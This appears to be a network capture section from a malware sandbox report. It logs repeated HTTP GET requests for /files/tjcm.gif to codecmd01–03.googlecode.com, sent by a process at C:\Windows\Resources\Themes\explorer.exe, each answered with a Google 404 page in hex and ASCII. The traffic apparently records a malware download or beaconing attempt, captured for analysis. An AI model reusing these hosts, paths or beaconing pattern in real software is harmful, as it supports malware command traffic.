                                              User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko
                                              Host: codecmd01.googlecode.com
                                              Connection: Keep-Alive
                                              Sep 30, 2024 16:10:10.677654982 CEST1236INHTTP/1.1 404 Not Found
                                              Content-Type: text/html; charset=UTF-8
                                              Referrer-Policy: no-referrer
                                              Content-Length: 1575
                                              Date: Mon, 30 Sep 2024 14:10:10 GMT
                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 [TRUNCATED]
                                              Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> *{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/i [TRUNCATED]
                                              Sep 30, 2024 16:10:10.677748919 CEST494INData Raw: 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d 64 65 76 69 63 65 2d 70 69 78 65 6c 2d 72 61 74 69 6f 3a 32 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f
                                              Data Ascii: only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:15
                                              Sep 30, 2024 16:10:10.677778959 CEST494INData Raw: 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d 64 65 76 69 63 65 2d 70 69 78 65 6c 2d 72 61 74 69 6f 3a 32 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f
                                              Data Ascii: only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:15
                                              Sep 30, 2024 16:10:10.677947998 CEST1236INHTTP/1.1 404 Not Found
                                              Content-Type: text/html; charset=UTF-8
                                              Referrer-Policy: no-referrer
                                              Content-Length: 1575
                                              Date: Mon, 30 Sep 2024 14:10:10 GMT
                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 [TRUNCATED]
                                              Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> *{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/i [TRUNCATED]
                                              Sep 30, 2024 16:10:10.687923908 CEST494INData Raw: 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d 64 65 76 69 63 65 2d 70 69 78 65 6c 2d 72 61 74 69 6f 3a 32 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f
                                              Data Ascii: only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:15


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              85192.168.2.651236142.251.173.82806120C:\Windows\Resources\Themes\explorer.exe
                                              TimestampBytes transferredDirectionData
                                              Sep 30, 2024 16:10:11.024517059 CEST215OUTGET /files/tjcm.gif HTTP/1.1
                                              Accept: */*
                                              Accept-Encoding: gzip, deflate
                                              User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko
                                              Host: codecmd02.googlecode.com
                                              Connection: Keep-Alive
                                              Sep 30, 2024 16:10:11.701265097 CEST1236INHTTP/1.1 404 Not Found
                                              Content-Type: text/html; charset=UTF-8
                                              Referrer-Policy: no-referrer
                                              Content-Length: 1575
                                              Date: Mon, 30 Sep 2024 14:10:11 GMT
                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 [TRUNCATED]
                                              Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> *{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/i [TRUNCATED]
                                              Sep 30, 2024 16:10:11.701284885 CEST494INData Raw: 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d 64 65 76 69 63 65 2d 70 69 78 65 6c 2d 72 61 74 69 6f 3a 32 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f
                                              Data Ascii: only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:15


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              86192.168.2.65123764.233.184.82806120C:\Windows\Resources\Themes\explorer.exe
                                              TimestampBytes transferredDirectionData
                                              Sep 30, 2024 16:10:12.049524069 CEST215OUTGET /files/tjcm.gif HTTP/1.1
                                              Accept: */*
                                              Accept-Encoding: gzip, deflate
                                              User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko
                                              Host: codecmd03.googlecode.com
                                              Connection: Keep-Alive
                                              Sep 30, 2024 16:10:13.265836000 CEST1236INHTTP/1.1 404 Not Found
                                              Content-Type: text/html; charset=UTF-8
                                              Referrer-Policy: no-referrer
                                              Content-Length: 1575
                                              Date: Mon, 30 Sep 2024 14:10:12 GMT
                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 [TRUNCATED]
                                              Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> *{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/i [TRUNCATED]
                                              Sep 30, 2024 16:10:13.265860081 CEST494INData Raw: 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d 64 65 76 69 63 65 2d 70 69 78 65 6c 2d 72 61 74 69 6f 3a 32 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f
                                              Data Ascii: only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:15
                                              Sep 30, 2024 16:10:13.265870094 CEST494INData Raw: 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d 64 65 76 69 63 65 2d 70 69 78 65 6c 2d 72 61 74 69 6f 3a 32 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f
                                              Data Ascii: only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:15
                                              Sep 30, 2024 16:10:13.266026974 CEST1236INHTTP/1.1 404 Not Found
                                              Content-Type: text/html; charset=UTF-8
                                              Referrer-Policy: no-referrer
                                              Content-Length: 1575
                                              Date: Mon, 30 Sep 2024 14:10:12 GMT
                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 [TRUNCATED]
                                              Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> *{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/i [TRUNCATED]


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              87192.168.2.651238173.194.76.82806120C:\Windows\Resources\Themes\explorer.exe
                                              TimestampBytes transferredDirectionData
                                              Sep 30, 2024 16:10:13.781156063 CEST215OUTGET /files/tjcm.gif HTTP/1.1
                                              Accept: */*
                                              Accept-Encoding: gzip, deflate
                                              User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko
                                              Host: codecmd01.googlecode.com
                                              Connection: Keep-Alive
                                              Sep 30, 2024 16:10:14.401773930 CEST1236INHTTP/1.1 404 Not Found
                                              Content-Type: text/html; charset=UTF-8
                                              Referrer-Policy: no-referrer
                                              Content-Length: 1575
                                              Date: Mon, 30 Sep 2024 14:10:14 GMT
                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 [TRUNCATED]
                                              Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> *{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/i [TRUNCATED]
                                              Sep 30, 2024 16:10:14.401797056 CEST494INData Raw: 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d 64 65 76 69 63 65 2d 70 69 78 65 6c 2d 72 61 74 69 6f 3a 32 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f
                                              Data Ascii: only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:15


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              88192.168.2.651239142.251.173.82806120C:\Windows\Resources\Themes\explorer.exe
                                              TimestampBytes transferredDirectionData
                                              Sep 30, 2024 16:10:14.783014059 CEST215OUTGET /files/tjcm.gif HTTP/1.1
                                              Accept: */*
                                              Accept-Encoding: gzip, deflate
                                              User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko
                                              Host: codecmd02.googlecode.com
                                              Connection: Keep-Alive
                                              Sep 30, 2024 16:10:15.488164902 CEST1236INHTTP/1.1 404 Not Found
                                              Content-Type: text/html; charset=UTF-8
                                              Referrer-Policy: no-referrer
                                              Content-Length: 1575
                                              Date: Mon, 30 Sep 2024 14:10:15 GMT
                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 [TRUNCATED]
                                              Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> *{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/i [TRUNCATED]
                                              Sep 30, 2024 16:10:15.488183022 CEST494INData Raw: 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d 64 65 76 69 63 65 2d 70 69 78 65 6c 2d 72 61 74 69 6f 3a 32 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f
                                              Data Ascii: only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:15


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              89192.168.2.65124064.233.184.82806120C:\Windows\Resources\Themes\explorer.exe
                                              TimestampBytes transferredDirectionData
                                              Sep 30, 2024 16:10:15.857002020 CEST215OUTGET /files/tjcm.gif HTTP/1.1
                                              Accept: */*
                                              Accept-Encoding: gzip, deflate
                                              User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko
                                              Host: codecmd03.googlecode.com
                                              Connection: Keep-Alive
                                              Sep 30, 2024 16:10:16.596112013 CEST1236INHTTP/1.1 404 Not Found
                                              Content-Type: text/html; charset=UTF-8
                                              Referrer-Policy: no-referrer
                                              Content-Length: 1575
                                              Date: Mon, 30 Sep 2024 14:10:16 GMT
                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 